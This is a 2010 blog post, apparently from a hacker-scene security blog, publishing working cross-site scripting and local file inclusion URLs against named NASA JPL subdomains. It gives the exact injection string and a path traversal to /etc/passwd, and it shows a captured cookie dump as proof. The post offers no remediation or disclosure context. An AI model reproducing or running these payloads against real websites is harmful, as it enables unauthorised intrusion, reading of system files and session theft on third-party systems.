Monday, September 13, 2010

Nasa.gov XSS,LFI Vulnerability

0
in

#Title: Nasa.gov XSS,LFI Vulnerability
#Risk: (4/5)
#Release Date: 12.09.2010
#Vulnerability discovered by: Blo0d

XSS:
http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3Cimg%20src=%22http://i25.tinypic.com/6sxahh.jpg%22/%3E

LFI:
http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=Icebergs&Image=../../../../../../../../etc/passwd.htm
**********************************************************************
document.cookie
_utmz=61147818.1284383833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61147818.1094787998.1284383833.1284383833.1284384281.2; __utmc=61147818; __utmb=61147818.4.10.1284384281
**********************************************************************

Mirror: http://i56.tinypic.com/2vtwpzo.png

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting